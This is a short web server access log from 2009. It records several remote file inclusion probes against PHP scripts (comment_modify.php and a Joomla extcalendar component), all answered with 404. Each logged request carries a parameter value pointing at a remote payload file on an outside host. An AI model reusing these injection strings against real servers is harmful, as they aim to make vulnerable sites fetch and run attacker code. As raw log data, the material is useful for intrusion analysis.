213.171.225.234 - - [29/Nov/2009:21:42:59 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:21:47:55 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [29/Nov/2009:21:47:55 -0800] "GET /logs/access.log%20%20///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
